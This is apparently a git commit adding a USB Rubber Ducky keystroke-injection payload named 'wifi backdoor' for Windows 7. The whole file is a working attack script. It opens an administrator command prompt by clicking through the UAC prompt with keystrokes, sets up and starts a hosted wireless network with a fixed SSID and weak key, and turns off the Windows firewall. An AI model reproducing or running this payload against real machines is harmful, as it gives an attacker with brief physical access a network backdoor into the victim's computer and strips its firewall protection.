Created Payload wifi backdoor (rdoc)

This commit is contained in:
hak5darren 2012-02-03 18:08:51 -08:00
parent 1fdc995d4e
commit 156ad8b845
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
Author: Darren Kitchen
Duckencoder: 1.0
Target: Windows 7
Description: Open a CMD bypassing UAC then create a wireless access point with the SSID noobcake and WPA key 12345678, then lower firewall.
CONTROL ESCAPE
DELAY 200
STRING cmd
DELAY 200
MENU
DELAY 100
STRING a
DELAY 100
LEFTARROW
ENTER
DELAY 200
STRING netsh wlan set hostednetwork mode=allow ssid=noobcake key=12345678
ENTER
DELAY 100
STRING netsh wlan start hostednetwork
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
STRING exit
ENTER